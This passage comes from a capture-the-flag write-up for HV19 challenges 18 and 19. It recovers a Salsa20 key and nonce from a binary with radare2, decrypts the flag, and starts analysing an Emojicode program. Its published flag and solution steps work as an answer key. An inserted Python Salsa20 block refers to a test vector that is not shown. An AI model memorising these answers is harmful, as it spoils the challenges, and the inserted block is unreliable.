binary.\n<br\/>\n<br\/>Finding the nonce was quite easy, since it is passed as the last argument to <code>_dance<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/18_02_nonce.png\" width=\"400px\"\/>\n<br\/>\n<br\/>The key can also be read from ghidra or by using <code>radare2<\/code>. 
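The constant 0x79622d32 is the little-endian encoding of the ASCII string 2-by, one of the four words of the Salsa20 constant expand 32-byte k, which is why it identifies the cipher. As an added cross-check, not part of the write-up or of the binary, the following pure-Python Salsa20/20 shows the state layout _dance_block works on (constants, key, nonce and block counter) and decrypts the challenge ciphertext with the 32-byte key from the start of __const and the nonce passed to _dance, both as listed in the radare2 dump and the PyCryptodome script that follow.

```python
import struct

# Key (first 32 bytes of __const) and nonce (last argument of _dance), as read
# from the binary in the write-up; ciphertext from the challenge description.
KEY = bytes([0x03, 0x20, 0x63, 0x46, 0x61, 0xb6, 0x3c, 0xaf, 0xaa, 0x76,
             0xc2, 0x7e, 0xea, 0x00, 0xb5, 0x9b, 0xfb, 0x2f, 0x70, 0x97,
             0x21, 0x4f, 0xd0, 0x4c, 0xb2, 0x57, 0xac, 0x29, 0x04, 0xef,
             0xee, 0x46])
NONCE = struct.pack("<Q", 0xb132d0a8e78f4511)
CIPHERTEXT = bytes.fromhex("096CD446EBC8E04D2FDE299BE44F322863F7A37C18763554EEE4C99C3FAD15")

SIGMA = b"expand 32-byte k"   # the 4 constant words; "2-by" is 0x79622d32 little-endian


def _rotl32(v, n):
    return ((v << n) & 0xFFFFFFFF) | (v >> (32 - n))


def quarterround(y0, y1, y2, y3):
    """Salsa20 quarter-round on four 32-bit words."""
    y1 ^= _rotl32((y0 + y3) & 0xFFFFFFFF, 7)
    y2 ^= _rotl32((y1 + y0) & 0xFFFFFFFF, 9)
    y3 ^= _rotl32((y2 + y1) & 0xFFFFFFFF, 13)
    y0 ^= _rotl32((y3 + y2) & 0xFFFFFFFF, 18)
    return y0, y1, y2, y3


def salsa20_block(key, nonce, counter):
    """One 64-byte keystream block of Salsa20/20 (32-byte key, 8-byte nonce).
    State layout: constants on the diagonal (0, 5, 10, 15), key words at 1-4
    and 11-14, nonce at 6-7, 64-bit block counter at 8-9, all little-endian."""
    s = struct.unpack("<4I", SIGMA)
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    c = struct.unpack("<2I", struct.pack("<Q", counter))
    x = [s[0], k[0], k[1], k[2], k[3], s[1], n[0], n[1],
         c[0], c[1], s[2], k[4], k[5], k[6], k[7], s[3]]
    z = list(x)
    for _ in range(10):                      # 10 double rounds = 20 rounds
        # column round
        z[0], z[4], z[8], z[12] = quarterround(z[0], z[4], z[8], z[12])
        z[5], z[9], z[13], z[1] = quarterround(z[5], z[9], z[13], z[1])
        z[10], z[14], z[2], z[6] = quarterround(z[10], z[14], z[2], z[6])
        z[15], z[3], z[7], z[11] = quarterround(z[15], z[3], z[7], z[11])
        # row round
        z[0], z[1], z[2], z[3] = quarterround(z[0], z[1], z[2], z[3])
        z[5], z[6], z[7], z[4] = quarterround(z[5], z[6], z[7], z[4])
        z[10], z[11], z[8], z[9] = quarterround(z[10], z[11], z[8], z[9])
        z[15], z[12], z[13], z[14] = quarterround(z[15], z[12], z[13], z[14])
    return struct.pack("<16I", *[(a + b) & 0xFFFFFFFF for a, b in zip(x, z)])


def salsa20_xor(key, nonce, data):
    """Stream-cipher XOR; encryption and decryption are the same operation."""
    out = bytearray()
    for start in range(0, len(data), 64):
        keystream = salsa20_block(key, nonce, start // 64)
        out += bytes(a ^ b for a, b in zip(data[start:start + 64], keystream))
    return bytes(out)


def decrypt_flag():
    return salsa20_xor(KEY, NONCE, CIPHERTEXT)


if __name__ == "__main__":
    print(decrypt_flag().decode("latin-1"))
```

Recognising the four constant words in the disassembly is usually faster than reading the round function: they sit at fixed positions 0, 5, 10 and 15 of the initial state, and the words the binary places next to them are exactly the key and nonce one needs. The quarter-round test vector below is the one from the Salsa20 specification.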
The first 32 bytes within the <code>__const<\/code> section are the key:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">[0x0000bda2]&gt; iS\n[Sections]\nNm Paddr       Size Vaddr      Memsz Perms Name\n00 0x0000ba40  1180 0x0000ba40  1180 -r-x 0.__TEXT.__text\n01 0x0000bedc    96 0x0000bedc    96 -r-x 1.__TEXT.__picsymbolstub4\n02 0x0000bf3c   108 0x0000bf3c   108 -r-x 2.__TEXT.__stub_helper\n03 0x0000bfa8    64 0x0000bfa8    64 -r-x 3.__TEXT.__const\n04 0x0000bfe8    23 0x0000bfe8    23 -r-x 4.__TEXT.__cstring\n05 0x0000c000    12 0x0000c000    12 -rw- 5.__DATA.__nl_symbol_ptr\n06 0x0000c00c    24 0x0000c00c    24 -rw- 6.__DATA.__la_symbol_ptr\n07 0x0000c024     8 0x0000c024     8 -rw- 7.__DATA.__objc_imageinfo\n08 0x0000c02c     4 0x0000c02c     4 -rw- 8.__DATA.__data\n\n[0x0000bda2]&gt; px 100 @ 0x0000bfa8\n- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF\n0x0000bfa8  0320 6346 61b6 3caf aa76 c27e ea00 b59b  . 
cFa.&lt;..v.~....\n0x0000bfb8  fb2f 7097 214f d04c b257 ac29 04ef ee46  .\/p.!O.L.W.)...F\n0x0000bfc8  7973 0ff4 ec0c 406b fd91 c91f e704 00a8  ys....@k........\n0x0000bfd8  adf1 6c63 456a 5ef1 ed9d 7946 9da2 a0b5  ..lcEj^...yF....\n0x0000bfe8  496e 7075 7420 796f 7572 2066 6c61 673a  Input your flag:\n0x0000bff8  2000 2530 3258 0000 0000 0000 0000 0000   .%02X..........\n0x0000c008  0000 0000                                ....\n[0x0000bda2]&gt; pc 32 @ 0x0000bfa8\n#define _BUFFER_SIZE 32\nconst uint8_t buffer[32] = {\n  0x03, 0x20, 0x63, 0x46, 0x61, 0xb6, 0x3c, 0xaf, 0xaa, 0x76,\n  0xc2, 0x7e, 0xea, 0x00, 0xb5, 0x9b, 0xfb, 0x2f, 0x70, 0x97,\n  0x21, 0x4f, 0xd0, 0x4c, 0xb2, 0x57, 0xac, 0x29, 0x04, 0xef,\n  0xee, 0x46\n};\n<\/pre>\n<br\/>Using these values we can actually decrypt the flag with the following python script:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom Crypto.Cipher import Salsa20\nimport struct\n\nn = struct.pack('&lt;Q', 0xb132d0a8e78f4511)\nkey = ''.join(chr(x) for x in [0x03, 0x20, 0x63, 0x46, 0x61, 0xb6, 0x3c, 0xaf, 0xaa, 0x76,\n  0xc2, 0x7e, 0xea, 0x00, 0xb5, 0x9b, 0xfb, 0x2f, 0x70, 0x97,\n  0x21, 0x4f, 0xd0, 0x4c, 0xb2, 0x57, 0xac, 0x29, 0x04, 0xef,\n  0xee, 0x46])\n\nfl_encrypted = '096CD446EBC8E04D2FDE299BE44F322863F7A37C18763554EEE4C99C3FAD15'.decode('hex')\ncipher = Salsa20.new(key=key,nonce=n)\npt = cipher.encrypt(fl_encrypted)\nprint(pt)<\/pre>\n<br\/>Running the script yields the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/18# .\/decryptFlag.py\nHV19{Danc1ng_Salsa_in_ass3mbly}<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Danc1ng_Salsa_in_ass3mbly}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.19\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.19 - 
&#x1F385;<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_19.png\" \/><\/td><td style=\"color:#333333\">Author: M.<\/td><\/tr><tr><td colspan=\"2\">&#x1f3c1;&#x1f347;&#x1f3b6;&#x1f524;&#x1f407;&#x1f981;&#x1f35f;&#x1f5de;&#x1f370;&#x1f4d8;&#x1f956;&#x1f5bc;&#x1f6a9;&#x1f969;&#x1f635;&#x26fa;&#x2757;&#xfe0f;&#x1f950;&#x1f600;&#x1f349;&#x1f95e;&#x1f3c1;&#x1f449;&#xfe0f;&#x1f9c0;&#x1f34e;&#x1f36a;&#x1f680;&#x1f64b;&#x1f3d4;&#x1f34a;&#x1f61b;&#x1f414;&#x1f687;&#x1f537;&#x1f3b6;&#x1f4c4;&#x1f366;&#x1f4e9;&#x1f34b;&#x1f4a9;&#x2049;&#xfe0f;&#x1f344;&#x1f95c;&#x1f996;&#x1f4a3;&#x1f384;&#x1f968;&#x1f4fa;&#x1f96f;&#x1f4fd;&#x1f356;&#x1f420;&#x1f4d8;&#x1f444;&#x1f354;&#x1f355;&#x1f416;&#x1f32d;&#x1f377;&#x1f991;&#x1f374;&#x26ea;&#x1f927;&#x1f31f;&#x1f513;&#x1f525;&#x1f381;&#x1f9e6;&#x1f92c;&#x1f6b2;&#x1f514;&#x1f56f;&#x1f976;&#x2764;&#xfe0f;&#x1f48e;&#x1f4ef;&#x1f399;&#x1f39a;&#x1f39b;&#x1f4fb;&#x1f4f1;&#x1f50b;&#x1f608;&#x1f50c;&#x1f4bb;&#x1f42c;&#x1f5a8;&#x1f5b1;&#x1f5b2;&#x1f4be;&#x1f4bf;&#x1f9ee;&#x1f3a5;&#x1f39e;&#x1f50e;&#x1f4a1;&#x1f526;&#x1f3ee;&#x1f4d4;&#x1f4d6;&#x1f3d9;&#x1f601;&#x1f4a4;&#x1f47b;&#x1f6f4;&#x1f4d9;&#x1f4da;&#x1f953;&#x1f4d3;&#x1f6e9;&#x1f4dc;&#x1f4f0;&#x1f602;&#x1f347;&#x1f695;&#x1f516;&#x1f3f7;&#x1f4b0;&#x26f4;&#x1f4b4;&#x1f4b8;&#x1f681;&#x1f976;&#x1f4b3;&#x1f60e;&#x1f58d;&#x1f68e;&#x1f973;&#x1f4dd;&#x1f4c1;&#x1f5c2;&#x1f974;&#x1f4c5;&#x1f4c7;&#x1f4c8;&#x1f4c9;&#x1f4ca;&#x1f512;&#x26c4;&#x1f330;&#x1f577;&#x23f3;&#x1f4d7;&#x1f528;&#x1f6e0;&#x1f9f2;&#x1f427;&#x1f691;&#x1f9ea;&#x1f40b;&#x1f9ec;&#x1f52c;&#x1f52d;&#x1f4e1;&#x1f92a;&#x1f692;&#x1f489;&#x1f48a;&#x1f6cf;&#x1f6cb;&#x1f6bd;&#x1f6bf;&#x1f9f4;&#x1f9f7;&#x1f369;&#x1f9f9;&#x1f9fa;&#x1f63a;&#x1f9fb;&#x1f69a;&#x1f9ef;&#x1f607;&#x1f6ac;&#x1f5dc;&#x1f47d;&#x1f517;&#x1f9f0;&#x1f3bf;&#x1f6f7;&#x1f94c;&#x1f3af;&#x1f3b1;&#x1f3ae;&#x1f3b0;&#x1f3b2;&#x1f3ce;&#x1f975;&#x1f9e9;&#x1f3ad;&#x1f3a8;&#x1f9f5;&#
x1f9f6;&#x1f3bc;&#x1f3a4;&#x1f941;&#x1f3ac;&#x1f3f9;&#x1f393;&#x1f37e;&#x1f490;&#x1f35e;&#x1f52a;&#x1f4a5;&#x1f409;&#x1f69b;&#x1f995;&#x1f510;&#x1f357;&#x1f920;&#x1f433;&#x1f9eb;&#x1f41f;&#x1f5a5;&#x1f421;&#x1f33c;&#x1f922;&#x1f337;&#x1f30d;&#x1f308;&#x2728;&#x1f38d;&#x1f316;&#x1f92f;&#x1f41d;&#x1f9a0;&#x1f98b;&#x1f92e;&#x1f30b;&#x1f3e5;&#x1f3ed;&#x1f5fd;&#x26f2;&#x1f4af;&#x1f301;&#x1f303;&#x1f68c;&#x1f4d5;&#x1f69c;&#x1f6c1;&#x1f6f5;&#x1f6a6;&#x1f6a7;&#x26f5;&#x1f6f3;&#x1f4ba;&#x1f6a0;&#x1f6f0;&#x1f386;&#x1f915;&#x1f480;&#x1f913;&#x1f921;&#x1f47a;&#x1f916;&#x1f44c;&#x1f44e;&#x1f9e0;&#x1f440;&#x1f634;&#x1f5a4;&#x1f524;&#x20;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x3253;&#x20;&#x1f195;&#x1f36f;&#x1f41a;&#x1f522;&#x1f346;&#x1f438;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x1f58d;&#x1f195;&#x32b7;&#x20;&#x1f502;&#x20;&#x2318;&#x20;&#x1f195;&#x23e9;&#x23e9;&#x20;&#x1f414;&#x1f368;&#x1f346;&#x2757;&#xfe0f;&#x20;&#x1f414;&#x3253;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x20;&#x1f347;&#x20;&#x2318;&#x20;&#x27a1;&#xfe0f;&#x1f43d;&#x20;&#x32b7;&#x20;&#x1f43d;&#x20;&#x3253;&#x20;&#x2318;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x1f349;&#x20;&#x1f3b6;&#x1f524;&#x1f374;&#x1f399;&#x1f996;&#x1f4fa;&#x1f349;&#x1f4d8;&#x1f356;&#x1f4dc;&#x1f514;&#x1f31f;&#x1f991;&#x2764;&#xfe0f;&#x1f4a9;&#x1f50b;&#x2764;&#xfe0f;&#x1f514;&#x1f349;&#x1f4e9;&#x1f39e;&#x1f3ee;&#x1f31f;&#x1f4be;&#x26ea;&#x1f4fa;&#x1f96f;&#x1f973;&#x1f524;&#x20;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x1f15c;&#x20;&#x1f3b6;&#x1f524;&#x1f490;&#x1f421;&#x1f9f0;&#x1f3b2;&#x1f913;&#x1f69a;&#x1f9e9;&#x1f921;&#x1f524;&#x20;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x1f17c;&#x20;&#x1f600;&#x20;&#x1f524;&#x20;&#x1f512;&#x20;&#x27a1;&#xfe0f;&#x20;&#x1f385;&#x1f3fb;&#x2049;&#xfe0f;&#x20;&#x27a1;&#xfe0f;&#x20;&#x1f384;&#x1f6a9;&#x20;&#x1f524;&#x2757;&#xfe0f;&#x1f4c7;&#x1f52a;&#x20;&#x1f195;&#x20;&#x1f521;&#x20;&#x1f442;&#x1f3fc;&#x2757;&#xfe0f;&#x1f414;&#x1f368;&#x1f346;&#x2757;&#xfe0f;&#x1f414;&#x1f368;&#x1f44e;&#x1f346;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x
2757;&#xfe0f;&#x20;&#x27a1;&#xfe0f;&#x20;&#x1f13c;&#x20;&rarrhk;&#xfe0f;&#x1f414;&#x1f13c;&#x2757;&#xfe0f;&#x1f64c;&#x20;&#x1f414;&#x1f368;&#x1f346;&#x2757;&#xfe0f;&#x1f347;&#x1f92f;&#x1f407;&#x1f4bb;&#x1f524;&#x1f44e;&#x1f524;&#x2757;&#xfe0f;&#x1f349;&#x20;&#x2623;&#xfe0f;&#x1f347;&#x1f195;&#x1f9e0;&#x1f195;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&check;&#x1f502;&#x20;&#x2318;&#x20;&#x1f195;&#x23e9;&#x23e9;&#x1f414;&#x1f368;&#x1f346;&#x2757;&#xfe0f;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x1f347;&#x1f43d;&#x20;&#x32b7;&#x20;&#x1f43d;&#x20;&#x1f15c;&#x20;&#x2318;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x20;&#x27a1;&#xfe0f;&#x20;&#x2303;&#x1f43d;&#x20;&#x1f13c;&#x20;&#x2318;&#x20;&#x1f6ae;&#x1f414;&#x1f13c;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&Hat;&#x1f4a7;&#x1f37a;&#x2303;&#x2796;&#x1f414;&#x3253;&#x2757;&#xfe0f;&#x2797;&#x1f414;&#x1f368;&#x1f44e;&#x1f44d;&#x1f346;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x274c;&Hat;&#x274c;&#x1f4a7;&#x2318;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x2388;&#x20;&rarrhk;&#xfe0f;&#x20;&#x2318;&#x20;&#x25c0;&#x20;&#x1f414;&#x1f17c;&#x2757;&#xfe0f;&#x1f91d;&#x274e;&#x1f37a;&#x1f43d;&#x20;&#x32b7;&#x20;&#x1f43d;&#x20;&#x1f17c;&#x20;&#x2318;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x2796;&#x20;&#x1f91c;&#x1f91c;&#x20;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2795;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2796;&#x1f414;&#x1f13c;&#x2757;&#xfe0f;&#x2796;&#x1f414;&#x1f17c;&#x2757;&#xfe0f;&#x2795;&#x1f414;&#x1f368;&#x1f44d;&#x1f346;&#x2757;&#xfe0f;&#x1f91b;&#x2716;&#x1f414;&#x1f368;&#x1f44e;&#x1f44e;&#x1f44e;&#x1f346;&#x2757;&#xfe0f;&#x1f91b;&#x20;&#x1f64c;&#x20;&#x1f522;&#x2388;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x1f347;&#x20;&#x1f92f;&#x1f407;&#x1f4bb;&#x1f524;&#x1f44e;&#x1f524;&#x2757;&#xfe0f;&#x1f349;&#x270d;&check;&#x20;&#x2388;&#x20;&#x2318;&#x20;&#x1f414;&#x1f368;&#x1f44e;&#x1f346;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x1f349;&#x1f521;&#x1f195;&#x1f4c7;&#x1f9e0;&check;&#x20;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2757;&#xf
e0f;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x2318;&rarrhk;&#xfe0f;&#x2318;&#x20;&#x1f64c;&#x20;&#x1f937;&zwj;&female;&#xfe0f;&#x1f347;&#x1f92f;&#x1f407;&#x1f4bb;&#x1f524;&#x1f44e;&#x1f524;&#x2757;&#xfe0f;&#x1f349;&#x1f600;&#x1f37a;&#x2318;&#x2757;&#xfe0f;&#x1f349;&#x20;&#x1f349;<\/td><\/tr><\/tbody><\/table>\n<br\/>The challenge description only contains the above unicode smileys. At first it reminded me of the <a href=\"https:\/\/devel0pment.de\/?p=461#chlg17\" rel=\"noopener noreferrer\" target=\"_blank\">Space Invaders challenge<\/a> from Hacky Easter 2018. However, there are many more smileys in this challenge. A bit of googling finally revealed that it is actually a program written in <a href=\"https:\/\/www.emojicode.org\/\" rel=\"noopener noreferrer\" target=\"_blank\">Emojicode<\/a>.\n<br\/>\n<br\/>Prebuilt binaries of the Emojicode compiler can be downloaded <a href=\"https:\/\/github.com\/emojicode\/emojicode\/releases\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a>. After saving the smileys to a file called <code>day19.emojic<\/code>, we can compile it using <code>emojicodec<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19\/Emojicode-1.0-beta.1-Linux-x86_64# .\/emojicodec ..\/day19.emojic \n..\/day19.emojic:1:297: &#9888;&#65039;  warning: Type is ambiguous without more context.\n...<\/pre>\n<br\/>The compiler creates an ELF file called <code>day19<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# file day19\nday19: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=7bf6c5daf4f8a5e185a8db0956a125262dce3132, for GNU\/Linux 3.2.0, not stripped<\/pre>\n<br\/>When running the binary, a few smileys are displayed and we are prompted to enter something. 
When entering <code>test<\/code>, for example, we get a negative response (<code>Program panicked<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# .\/day19 \n &#128274; &#10145;&#65039; &#127877;&#127995;&#8265;&#65039; &#10145;&#65039; &#127876;&#128681; \ntest\n&#129327; Program panicked: &#128078;\nAborted<\/pre>\n<br\/>My first approach was to reverse the binary created by the Emojicode compiler. However, this did not seem to promise any quick wins, so I started to have a look at the Emojicode itself. The documentation is quite patchy, which also didn't make this too easy.\n<br\/>\n<br\/>At first let's indent the code. The Emojicode compiler is capable of formatting a program by using the option <code>--format<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19\/Emojicode-1.0-beta.1-Linux-x86_64# .\/emojicodec --format ..\/day19.emojic\n...\nroot@kali:~\/hv19\/19\/Emojicode-1.0-beta.1-Linux-x86_64# cat ..\/day19.emojic\n&#127937; &#127815;\n  
&#127926;&#128292;&#128007;&#129409;&#127839;&#128478;&#127856;&#128216;&#129366;&#128444;&#128681;&#129385;&#128565;&#9978;&#10071;&#65039;&#129360;&#128512;&#127817;&#129374;&#127937;&#128073;&#65039;&#129472;&#127822;&#127850;&#128640;&#128587;&#127956;&#127818;&#128539;&#128020;&#128647;&#128311;&#127926;&#128196;&#127846;&#128233;&#127819;&#128169;&#8265;&#65039;&#127812;&#129372;&#129430;&#128163;&#127876;&#129384;&#128250;&#129391;&#128253;&#127830;&#128032;&#128216;&#128068;&#127828;&#127829;&#128022;&#127789;&#127863;&#129425;&#127860;&#9962;&#129319;&#127775;&#128275;&#128293;&#127873;&#129510;&#129324;&#128690;&#128276;&#128367;&#129398;&#10084;&#65039;&#128142;&#128239;&#127897;&#127898;&#127899;&#128251;&#128241;&#128267;&#128520;&#128268;&#128187;&#128044;&#128424;&#128433;&#128434;&#128190;&#128191;&#129518;&#127909;&#127902;&#128270;&#128161;&#128294;&#127982;&#128212;&#128214;&#127961;&#128513;&#128164;&#128123;&#128756;&#128217;&#128218;&#129363;&#128211;&#128745;&#128220;&#128240;&#128514;&#127815;&#128661;&#128278;&#127991;&#128176;&#9972;&#128180;&#128184;&#128641;&#129398;&#128179;&#128526;&#128397;&#128654;&#129395;&#128221;&#128193;&#128450;&#129396;&#128197;&#128199;&#128200;&#128201;&#128202;&#128274;&#9924;&#127792;&#128375;&#9203;&#128215;&#128296;&#128736;&#129522;&#128039;&#128657;&#129514;&#128011;&#129516;&#128300;&#128301;&#128225;&#129322;&#128658;&#128137;&#128138;&#128719;&#128715;&#128701;&#128703;&#129524;&#129527;&#127849;&#129529;&#129530;&#128570;&#129531;&#128666;&#129519;&#128519;&#128684;&#128476;&#128125;&#128279;&#129520;&#127935;&#128759;&#129356;&#127919;&#127921;&#127918;&#127920;&#127922;&#127950;&#129397;&#129513;&#127917;&#127912;&#129525;&#129526;&#127932;&#127908;&#129345;&#127916;&#127993;&#127891;&#127870;&#128144;&#127838;&#128298;&#128165;&#128009;&#128667;&#129429;&#128272;&#127831;&#129312;&#128051;&#129515;&#128031;&#128421;&#128033;&#127804;&#129314;&#127799;&#127757;&#127752;&#10024;&#127885;&#127766;&#1
29327;&#128029;&#129440;&#129419;&#129326;&#127755;&#127973;&#127981;&#128509;&#9970;&#128175;&#127745;&#127747;&#128652;&#128213;&#128668;&#128705;&#128757;&#128678;&#128679;&#9973;&#128755;&#128186;&#128672;&#128752;&#127878;&#129301;&#128128;&#129299;&#129313;&#128122;&#129302;&#128076;&#128078;&#129504;&#128064;&#128564;&#128420;&#128292;&#10071;&#65039; &#10145;&#65039; &#12883;\n  &#127381;&#127855;&#128026;&#128290;&#127814;&#128056;&#10071;&#65039;&#10145;&#65039; &#128397;&#127381; &#12983;\n  &#128258; &#8984; &#127381;&#9193;&#9193; &#128020;&#127848; &#127814;&#10071;&#65039;&#128020;&#12883;&#10071;&#65039;&#10071;&#65039; &#127815;\n    &#8984; &#10145;&#65039; &#128061;&#12983; &#128061;&#12883; &#8984;&#10071;&#65039;&#10071;&#65039;\n  &#127817;\n\n  &#127926;&#128292;&#127860;&#127897;&#129430;&#128250;&#127817;&#128216;&#127830;&#128220;&#128276;&#127775;&#129425;&#10084;&#65039;&#128169;&#128267;&#10084;&#65039;&#128276;&#127817;&#128233;&#127902;&#127982;&#127775;&#128190;&#9962;&#128250;&#129391;&#129395;&#128292;&#10071;&#65039; &#10145;&#65039; &#127324;\n  &#127926;&#128292;&#128144;&#128033;&#129520;&#127922;&#129299;&#128666;&#129513;&#129313;&#128292;&#10071;&#65039; &#10145;&#65039; &#127356;\n  &#128512;&#128292; &#128274; &#10145;&#65039; &#127877;&#127995;&#8265;&#65039; &#10145;&#65039; &#127876;&#128681; &#128292;&#10071;&#65039;\n  &#128199;&#128298;&#127381;&#128289;&#128066;&#127996;&#10071;&#65039; &#128020;&#127848; &#127814;&#10071;&#65039;&#128020;&#127848; &#128078; &#127814;&#10071;&#65039;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#127292;\n  &#8618;&#65039; &#128020;&#127292;&#10071;&#65039; &#128588; &#128020;&#127848; &#127814;&#10071;&#65039; &#127815;\n    &#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;\n  &#127817;\n\n  &#9763;&#65039; &#127815;\n    &#127381;&#129504;&#127381; &#128020;&#127324;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#10003;\n    &#128258; &#8984; 
&#127381;&#9193;&#9193; &#128020;&#127848; &#127814;&#10071;&#65039;&#128020;&#127324;&#10071;&#65039;&#10071;&#65039; &#127815;\n      &#128061;&#12983; &#128061;&#127324; &#8984;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#8963;\n      &#128061;&#127292; &#8984; &#128686; &#128020;&#127292;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; ^\n      &#128167; &#127866;&#8963; &#10134; &#128020;&#12883;&#10071;&#65039; &#10135; &#128020;&#127848; &#128078; &#128077; &#127814;&#10071;&#65039;&#10071;&#65039; &#10060; ^ &#10060; &#128167;&#8984;&#10071;&#65039; &#10145;&#65039; &#9096;\n      &#8618;&#65039; &#8984; &#9664; &#128020;&#127356;&#10071;&#65039; &#129309; &#10062; &#127866;&#128061;&#12983; &#128061;&#127356; &#8984;&#10071;&#65039;&#10071;&#65039; &#10134; &#129308;&#128020;&#127324;&#10071;&#65039; &#10133; &#128020;&#127324;&#10071;&#65039; &#10134; &#128020;&#127292;&#10071;&#65039; &#10134; &#128020;&#127356;&#10071;&#65039; &#10133; &#128020;&#127848; &#128077; &#127814;&#10071;&#65039;&#129307; &#10006; &#128020;&#127848; &#128078; &#128078; &#128078; &#127814;&#10071;&#65039; &#128588; &#128290;&#9096;&#10071;&#65039;&#10071;&#65039; &#127815;\n        &#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;\n      &#127817;\n\n      &#9997;&#10003; &#9096;&#8984;&#128020;&#127848; &#128078; &#127814;&#10071;&#65039;&#10071;&#65039;\n    &#127817;\n\n    &#128289;&#127381;&#128199;&#129504; &#10003;&#128020;&#127324;&#10071;&#65039;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#8984;\n    &#8618;&#65039; &#8984; &#128588; &#129335;&#8205;&#9792;&#65039; &#127815;\n      &#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;\n    &#127817;\n\n    &#128512; &#127866;&#8984;&#10071;&#65039;\n  &#127817;\n\n&#127817;<\/pre>\n<br\/>The indented code can be read more easily. 
The following line seems to output the smileys that we see when running the binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">  &#128512;&#128292; &#128274; &#10145;&#65039; &#127877;&#127995;&#8265;&#65039; &#10145;&#65039; &#127876;&#128681; &#128292;&#10071;&#65039;<\/pre>\n<br\/>Also, there are multiple occurrences of the sequence that seems to trigger the negative response (<code>Program panicked<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">&#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;<\/pre>\n<br\/>By adding an output (in this case a chicken) before the panic sequence, we can determine which one is actually triggered:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">&#128512;&#128292; &#128020; &#128292;&#10071;&#65039;\n&#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;<\/pre>\n<br\/>\n<br\/>In order to quickly run the adjusted program, we can use <a href=\"https:\/\/tio.run\/#emojicode6\" rel=\"noopener noreferrer\" target=\"_blank\">tio.run<\/a>. The indented code raises an error when trying to run it, but the adjustment can be done in the original code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_01_add.png\" \/>\n<br\/>\n<br\/>As we can see, the output contains the chicken we added before the first panic sequence. 
